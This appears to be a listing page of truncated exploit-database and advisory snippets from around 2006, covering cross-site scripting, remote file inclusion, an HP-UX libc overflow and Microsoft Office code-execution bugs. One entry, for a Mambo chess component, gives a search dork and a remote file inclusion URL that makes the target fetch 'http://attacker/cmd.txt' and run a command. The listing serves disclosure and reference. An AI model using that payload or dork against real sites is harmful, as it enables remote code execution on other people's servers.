Hacking AJAX DWR Applications

By Guy Karlebach & Amichai Shulman Introduction The introduction of AJAX into a web application improves the user experience significantly. However, the complexity of some AJAX frameworks and the limited field experience with them requires a careful examination of potential vulnerabilities. DWR i...

GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities

GenesisTrader 1.0 - form.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/21595/info GenesisTrader is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include...

CVE-2006-6276

HTTP request smuggling vulnerability in Sun Java System Proxy Server before 20061130, when used with Sun Java System Application Server or Sun Java System Web Server, allows remote attackers to bypass HTTP request filtering, hijack web sessions, perform cross-site scripting XSS, and poison web...

encapscms 0.3.6 - Remote File Include by Firewall

Firewall encapscms 0.3.6 - Remote File Include by Firewall BuG FounD by Firewall Application Affect: encapscms 0.3.6 Sorce Code: http://scripts.ringsworld.com/content-management/encapscms-0.3.6.zip Code: includeonce$root."core/Config.php"; includeonce$root."core/DBsql.php";...

Microsoft Outlook Express Windows地址簿文件解析溢出漏洞（MS06-016）

Microsoft Outlook Express是Microsoft Windows操作系统捆绑的邮件和新闻组客户端。 Microsoft Outlook Express在解析特制的Windows地址簿（.wab）文件时存在堆溢出漏洞，攻击者可以诱骗用户打开特制的.wab文件导致在用户系统上执行任意代码。 Microsoft Outlook Express 5.5 SP2 - Microsoft Windows 2000 SP4 Microsoft Outlook Express 6.0 - Microsoft Windows XP SP2 - Microsoft Windows...

HP-UX 11i (LIBC TZ enviroment variable) Local Root Exploit

No description provided by source. / HP-UX libc timezone environment overflow exploit ================================================ HP-UX libc contains an exploitable stack overflow in the handling of "TZ" environment variable. The problem occurs due to insufficient bounds checking in the...

HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation

/ HP-UX libc timezone environment overflow exploit ================================================ HP-UX libc contains an exploitable stack overflow in the handling of "TZ" environment variable. The problem occurs due to insufficient bounds checking in the localtimer and related functions. Any...

Another Mambo module remote inclusion vulneribility

Bug Found by h4ntu http://h4ntu.com batamhacker crew Another Mambo module remote inclusion vulneribility download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip bug found in file : MambWeather/Savant2/Savant2Pluginoptions.php ?php / Base plugin class. / global...

Buzlas 2006-1 Full - Archive_Topic.php Remote File Inclusion

Buzlas 2006-1 Full - ArchiveTopic.php Remote File Inclusion source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue may allow an attacker to compromise the...

CVE-2006-4694

Unspecified vulnerability in PowerPoint in Microsoft Office 2000, Office XP and Office 2003 allows user-assisted attackers to execute arbitrary code via a crafted record in a PPT file, as exploited by malware such as Exploit:Win32/Controlppt.W, Exploit:Win32/Controlppt.X, and...

CVE-2006-4990

CVE-2006-4990 describes PHP remote file inclusion vulnerabilities in PhotoPost 4.0–4.6 where an attacker can execute arbitrary PHP code by supplying a URL to the PP_PATH parameter across multiple PHP scripts (e.g., zipndownload.php and others). The issue enables code execution via network access ...

e107 website system 0.7.5 - 'search.php?Query String (PATH_INFO)' Cross-Site Scripting

source: https://www.securityfocus.com/bid/19997/info e107 CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may levearge this issue to have arbitrary script code execute in the browser of an unsuspecting user i...

Mambo Component PrinceClan Chess 0.8 - Remote File Inclusion

pcchess Component - dork : index.php?option=compcchess - exploit : http://target/path/components/compcchess/include.pcchess.php?mosConfigabsolutepath=http://attacker/cmd.txt?&cmd=ls milw0rm.com 2006-07-24...

Microsoft Excel OBJECT Record Remote Code Execution Vulnerability

Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...

Microsoft Excel COLINFO Record Remote Code Execution Vulnerability

Description Microsoft Excel is prone to a remote code-execution vulnerability because it fails to handle exceptional conditions. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office...

Microsoft Excel LABEL Record Remote Code Execution Vulnerability

Description Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to corrupt process memory and to execute arbitrary code in the context of targeted users. Note that Microsoft Office applications include functionality to embed Offic...

Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution

Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of...

Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution

source: https://www.securityfocus.com/bid/18872/info Microsoft Excel is prone to a remote code-execution vulnerability. Successfully exploiting this issue allows attackers to execute arbitrary code in the context of targeted users. A proof-of-concept malicious code named 'Trojan.Hongmosa' is...

Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting

Cisco Secure ACS 2.3 - LoginProxy.cgi Cross-Site Scripting source: https://www.securityfocus.com/bid/18449/info Cisco Secure ACS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...

Manic Web MWGuest 2.1 - MWguest.php HTML Injection

Manic Web MWGuest 2.1 - MWguest.php HTML Injection source: https://www.securityfocus.com/bid/17630/info MWGuest is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HT...